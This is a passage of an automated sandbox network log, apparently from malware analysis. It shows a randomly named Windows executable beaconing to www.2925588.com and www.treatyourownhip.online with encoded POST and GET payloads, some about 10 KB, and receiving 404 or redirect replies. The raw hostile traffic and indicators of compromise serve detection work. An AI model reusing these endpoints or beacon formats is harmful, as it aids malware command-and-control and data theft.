Nov 7, 2024 08:09:59.315627098 CET	392	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 07 Nov 2024 07:09:59 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 50 6a 3d 72 7a 5f 44 26 4e 62 63 50 41 48 65 3d 41 48 73 54 32 6c 51 4d 37 61 66 6b 76 68 67 6f 54 58 61 45 50 6f 7a 4b 36 76 6e 73 43 32 4b 36 71 50 43 35 36 76 79 4c 59 2b 72 2f 68 62 71 4f 67 7a 61 6e 30 78 74 43 4e 38 4f 4c 34 42 6a 2f 50 75 73 7a 58 4a 48 76 6a 76 71 78 69 75 49 50 74 73 57 76 30 6f 4a 51 59 53 47 62 79 78 64 31 45 61 34 77 70 6f 2f 78 37 49 48 72 64 2f 61 57 6c 34 43 61 6a 61 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9Pj=rz_D&NbcPAHe=AHsT2lQM7afkvhgoTXaEPozK6vnsC2K6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0oJQYSGbyxd1Ea4wpo/x7IHrd/aWl4Cajac="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49905	103.71.154.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:04.364084005 CET	675	OUT	POST /1t94/ HTTP/1.1 Host: www.2925588.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.2925588.com Referer: http://www.2925588.com/1t94/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 71 59 61 65 44 4e 44 6b 47 34 34 51 65 6f 42 38 62 57 50 30 7a 47 55 75 6f 33 6c 67 4e 39 4f 57 41 41 48 79 78 70 35 36 53 32 4f 43 65 63 6d 36 41 78 4e 4b 51 55 72 62 65 7a 43 6f 6f 6c 44 4d 44 33 61 43 6d 47 56 6a 35 73 39 68 53 77 4a 32 32 2f 2b 31 78 36 33 4d 5a 41 57 5a 64 4e 52 43 5a 70 31 42 35 6d 6c 42 56 56 33 46 79 30 34 73 54 69 6c 6b 38 35 7a 36 37 50 71 6d 49 66 38 70 4b 47 65 41 75 48 6f 75 4c 49 31 63 34 52 6d 59 35 6c 53 53 6c 4a 64 72 69 34 30 6c 55 58 45 4a 46 68 41 78 56 59 4f 36 46 77 4b 52 73 42 2f 47 59 74 47 75 42 51 3d 3d Data Ascii: NbcPAHe=thkoKA3lS59VqYaeDNDkG44QeoB8bWP0zGUuo3lgN9OWAAHyxp56S2OCecm6AxNKQUrbezCoolDMD3aCmGVj5s9hSwJ22/+1x63MZAWZdNRCZp1B5mlBVV3Fy04sTilk85z67PqmIf8pKGeAuHouLI1c4RmY5lSSlJdri40lUXEJFhAxVYO6FwKRsB/GYtGuBQ==
Nov 7, 2024 08:10:05.316379070 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:10:05 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49921	103.71.154.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:06.911824942 CET	695	OUT	POST /1t94/ HTTP/1.1 Host: www.2925588.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.2925588.com Referer: http://www.2925588.com/1t94/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 6f 34 4b 65 42 71 58 6b 52 49 34 58 62 6f 42 38 56 32 50 77 7a 47 51 75 6f 32 68 4f 4b 50 61 57 44 67 33 79 6a 63 4e 36 58 32 4f 43 57 38 6d 37 4e 52 4e 44 51 55 58 54 65 7a 75 6f 6f 6c 6e 4d 44 32 71 43 6d 78 68 69 36 63 39 6e 48 67 4a 77 34 66 2b 31 78 36 33 4d 5a 41 43 7a 64 4e 4a 43 5a 59 46 42 34 48 6c 43 62 31 33 47 6c 45 34 73 58 69 6b 6a 38 35 7a 45 37 4c 4b 41 49 64 30 70 4b 46 4b 41 67 7a 38 68 46 49 30 32 6c 68 6d 54 36 67 50 64 6a 70 73 5a 76 6f 41 61 54 6a 51 57 45 6e 4e 72 45 70 76 74 58 77 75 69 78 47 32 79 56 75 37 6e 61 61 6f 4d 51 75 33 37 78 5a 34 39 34 6b 49 6d 61 31 2f 67 4f 44 38 3d Data Ascii: NbcPAHe=thkoKA3lS59Vo4KeBqXkRI4XboB8V2PwzGQuo2hOKPaWDg3yjcN6X2OCW8m7NRNDQUXTezuoolnMD2qCmxhi6c9nHgJw4f+1x63MZACzdNJCZYFB4HlCb13GlE4sXikj85zE7LKAId0pKFKAgz8hFI02lhmT6gPdjpsZvoAaTjQWEnNrEpvtXwuixG2yVu7naaoMQu37xZ494kIma1/gOD8=
Nov 7, 2024 08:10:07.853404999 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:10:07 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49935	103.71.154.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:09.466171980 CET	10777	OUT	POST /1t94/ HTTP/1.1 Host: www.2925588.com Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.2925588.com Referer: http://www.2925588.com/1t94/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 74 68 6b 6f 4b 41 33 6c 53 35 39 56 6f 34 4b 65 42 71 58 6b 52 49 34 58 62 6f 42 38 56 32 50 77 7a 47 51 75 6f 32 68 4f 4b 50 69 57 41 52 58 79 79 4c 52 36 51 32 4f 43 59 63 6d 6d 4e 52 4d 54 51 55 50 58 65 7a 79 34 6f 6e 50 4d 53 68 43 43 67 41 68 69 68 4d 39 6e 59 51 4a 31 32 2f 2b 61 78 36 6e 49 5a 41 53 7a 64 4e 4a 43 5a 62 4e 42 6f 6d 6c 43 5a 31 33 46 79 30 34 61 54 69 6c 45 38 35 37 79 37 4c 4f 50 49 4d 55 70 4c 6c 61 41 74 67 45 68 4a 49 30 30 6d 68 6e 54 36 67 4b 64 6a 70 42 67 76 71 67 77 54 6b 34 57 46 6d 30 52 52 5a 75 78 41 47 6d 5a 6a 33 4f 70 53 35 72 4b 57 59 67 33 65 37 33 54 7a 59 4d 2f 33 45 5a 66 65 57 37 6e 54 57 31 68 56 63 30 33 31 35 43 4b 6c 51 4e 4b 62 58 72 36 6e 33 38 6b 74 63 58 45 6a 38 54 4e 67 68 6d 43 68 36 30 55 57 4e 49 67 41 77 72 74 4e 53 35 58 6e 58 42 48 50 47 55 75 77 59 58 76 51 75 74 6c 73 45 61 54 4b 44 56 72 7a 7a 68 37 35 61 50 63 42 73 63 57 2f 72 70 43 34 73 57 35 6a 50 41 75 71 6b 55 45 56 73 6b 6f 67 73 31 58 50 63 6d 55 58 77 [TRUNCATED] Data Ascii: NbcPAHe=thkoKA3lS59Vo4KeBqXkRI4XboB8V2PwzGQuo2hOKPiWARXyyLR6Q2OCYcmmNRMTQUPXezy4onPMShCCgAhihM9nYQJ12/+ax6nIZASzdNJCZbNBomlCZ13Fy04aTilE857y7LOPIMUpLlaAtgEhJI00mhnT6gKdjpBgvqgwTk4WFm0RRZuxAGmZj3OpS5rKWYg3e73TzYM/3EZfeW7nTW1hVc0315CKlQNKbXr6n38ktcXEj8TNghmCh60UWNIgAwrtNS5XnXBHPGUuwYXvQutlsEaTKDVrzzh75aPcBscW/rpC4sW5jPAuqkUEVskogs1XPcmUXwzThZVU9kHjwDF9VYGmznryESEfjYsoUTDmFIlLr31LdplCzNHgVC4y5KZsWV5WPb1SvJVLpsonmx8eQoClq2it3O2BtOXcVA2log0I6PPlDfBX8uonyVc/XpUaUE9uJiIRCjV3pIKt8gaoYqrffR4EOhPmj04HuSVGzkBLE8g0A0df5kbFIfRrbAp0wGCNsk02Tr43tQb1OIJiDVNHD2k7I+eZyMVkWmo5oL1sxtYY9qd26jaq2NXLr+H54o4UJv+tWJTOhgFqsq0d+/yIm+byUGcH1fFqGHGxGg3VgVkWukI9YGsA4Uv4sM655YfDH+SixKCrw7Ivehj6bPSd3QtppuQ9n91Wss4E9J70b+DFJZt1lPUZlMLda2oskvpbaLnKaAuZTZpptuJ2fO+mx+x6PuKfPPQ/zweWMP1PZ3XbUufgm+V6FU5A64XUrmZs4HMN62BjWJnEA0t1Vq8JL6HKRJujcW2fxMx/Jam0dvkupSZW1jpRDN6W1RvEzUj4vsQTpoDNyZRskyZdN9v1UPXwPhnM+H6yWMsQlH10qYQcxZwW4E9F9IL5CumbpZ6tTSHPYD9/2+1JaqCJktopFU47vGAG/ggSvObignFoj5Lc68r87y41+LdC9yQ9OovzJHsAoIzdfhXBj9Dh/EwTfL8X6jkLUeXSvwKu [TRUNCATED]
Nov 7, 2024 08:10:10.431720018 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:10:10 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49951	103.71.154.12	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:12.002129078 CET	406	OUT	GET /1t94/?NbcPAHe=gjMIJwSCW/9UgfmAMdvHIdsDY5AHUjjwxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjcwSF2JZ6IaX0a+FZ1WtU911G5wO/kltYUU=&9Pj=rz_D HTTP/1.1 Host: www.2925588.com Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 7, 2024 08:10:12.939398050 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 07 Nov 2024 07:10:12 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49987	81.169.145.95	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:18.215296030 CET	708	OUT	POST /pq4g/ HTTP/1.1 Host: www.treatyourownhip.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.treatyourownhip.online Referer: http://www.treatyourownhip.online/pq4g/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 204 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 43 43 73 39 30 4a 6a 52 30 67 59 6b 62 2f 41 45 72 4c 67 76 55 61 46 61 33 43 6b 4b 53 4b 6e 56 6b 55 41 30 42 73 6a 61 52 45 78 68 2f 6e 4c 34 2b 70 47 6e 4a 4d 6f 38 31 72 6f 5a 64 39 65 4b 6c 39 68 77 44 4e 44 73 4d 73 6d 57 62 36 48 71 75 78 43 73 48 78 70 77 2f 45 37 58 49 79 41 5a 54 62 5a 65 4e 31 67 4c 2f 4c 36 53 64 2b 4c 48 76 6e 31 55 75 64 59 62 34 43 77 69 45 35 48 5a 71 71 30 2f 63 62 7a 49 58 6f 57 54 53 43 4e 46 6b 35 45 36 7a 64 59 69 30 78 66 4e 45 6d 33 79 62 43 66 2f 38 34 77 57 69 34 51 75 5a 4f 6f 57 56 4d 6b 46 72 41 3d 3d Data Ascii: NbcPAHe=yzT5osvCN/CmCCs90JjR0gYkb/AErLgvUaFa3CkKSKnVkUA0BsjaRExh/nL4+pGnJMo81roZd9eKl9hwDNDsMsmWb6HquxCsHxpw/E7XIyAZTbZeN1gL/L6Sd+LHvn1UudYb4CwiE5HZqq0/cbzIXoWTSCNFk5E6zdYi0xfNEm3ybCf/84wWi4QuZOoWVMkFrA==
Nov 7, 2024 08:10:19.041865110 CET	374	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:10:18 GMT Server: Apache/2.4.62 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50002	81.169.145.95	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:20.761446953 CET	728	OUT	POST /pq4g/ HTTP/1.1 Host: www.treatyourownhip.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.treatyourownhip.online Referer: http://www.treatyourownhip.online/pq4g/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 224 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 45 52 30 39 32 75 50 52 67 77 59 6a 55 66 41 45 6c 72 67 72 55 61 5a 61 33 44 67 6b 54 2f 2f 56 6c 78 6b 30 41 75 4c 61 53 45 78 68 6e 58 4c 35 30 4a 47 6f 4a 4d 6b 30 31 72 6b 5a 64 39 4b 4b 6c 38 52 77 45 2b 37 6a 4f 38 6d 51 44 4b 48 6f 78 42 43 73 48 78 70 77 2f 45 76 74 49 79 6f 5a 54 71 4a 65 4e 51 4d 4d 38 4c 36 4e 59 2b 4c 48 39 58 31 51 75 64 59 44 34 44 73 49 45 37 76 5a 71 6f 73 2f 64 4b 7a 4a 43 59 57 52 57 43 4d 6b 6a 4a 77 33 38 4e 4a 70 33 77 76 30 4e 6b 2f 64 65 45 53 6c 74 4a 52 42 77 34 30 64 45 4a 68 69 59 50 5a 4d 77 46 38 2b 54 7a 62 6a 4e 7a 42 30 39 44 2b 54 35 53 30 72 59 74 6f 3d Data Ascii: NbcPAHe=yzT5osvCN/CmER092uPRgwYjUfAElrgrUaZa3DgkT//Vlxk0AuLaSExhnXL50JGoJMk01rkZd9KKl8RwE+7jO8mQDKHoxBCsHxpw/EvtIyoZTqJeNQMM8L6NY+LH9X1QudYD4DsIE7vZqos/dKzJCYWRWCMkjJw38NJp3wv0Nk/deESltJRBw40dEJhiYPZMwF8+TzbjNzB09D+T5S0rYto=
Nov 7, 2024 08:10:21.596363068 CET	374	IN	HTTP/1.1 404 Not Found Date: Thu, 07 Nov 2024 07:10:21 GMT Server: Apache/2.4.62 (Unix) Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50015	81.169.145.95	80	4544	C:\Program Files (x86)\kUBrBnKDJXFWpBbrhPudZIIiqNcvcMIizUykiKldsuPkbLxYBjnmYMVQbjiZHTWK\hubOySeXSAbhw.exe

Timestamp	Bytes transferred	Direction	Data
Nov 7, 2024 08:10:23.303647041 CET	10810	OUT	POST /pq4g/ HTTP/1.1 Host: www.treatyourownhip.online Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.treatyourownhip.online Referer: http://www.treatyourownhip.online/pq4g/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10304 User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36 Data Raw: 4e 62 63 50 41 48 65 3d 79 7a 54 35 6f 73 76 43 4e 2f 43 6d 45 52 30 39 32 75 50 52 67 77 59 6a 55 66 41 45 6c 72 67 72 55 61 5a 61 33 44 67 6b 54 38 66 56 6c 44 73 30 42 49 44 61 64 6b 78 68 35 6e 4c 38 30 4a 47 78 4a 4d 4d 34 31 72 34 4a 64 2f 79 4b 6b 65 70 77 46 50 37 6a 48 38 6d 51 66 36 48 70 75 78 44 75 48 78 35 30 2f 45 2f 74 49 79 6f 5a 54 70 42 65 45 6c 67 4d 36 4c 36 53 64 2b 4c 39 76 6e 31 6f 75 64 77 54 34 44 59 79 45 4b 50 5a 71 49 38 2f 66 34 4c 4a 41 34 57 58 61 69 4d 47 6a 4a 74 33 38 4d 6c 44 33 77 62 53 4e 6d 6a 64 66 51 48 69 70 34 4e 70 72 36 73 67 63 37 78 52 44 2b 78 37 2b 48 77 48 57 52 61 6a 59 41 52 50 38 78 6a 4b 67 43 4d 50 50 74 62 73 43 4e 4c 31 6c 56 41 50 2b 39 62 4e 6a 39 67 2b 